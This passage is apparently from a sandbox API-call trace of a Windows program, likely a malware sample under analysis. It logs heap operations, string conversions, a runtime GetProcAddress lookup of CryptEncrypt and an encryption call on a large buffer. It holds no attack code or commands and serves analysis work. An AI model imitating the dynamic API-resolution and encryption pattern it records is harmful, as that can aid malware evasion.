Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.587] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0188.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.587] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.587] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.588] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.588] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34e07a0 | out: hHeap=0x25c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.591] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0188.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa748, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.593] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.594] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x172a0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x172a8) returned 1 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.598] CharLowerBuffW (in: lpsz="byte[94888]", cchLength=0xb | out: lpsz="byte[94888]") returned 0xb [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.598] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0188.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) 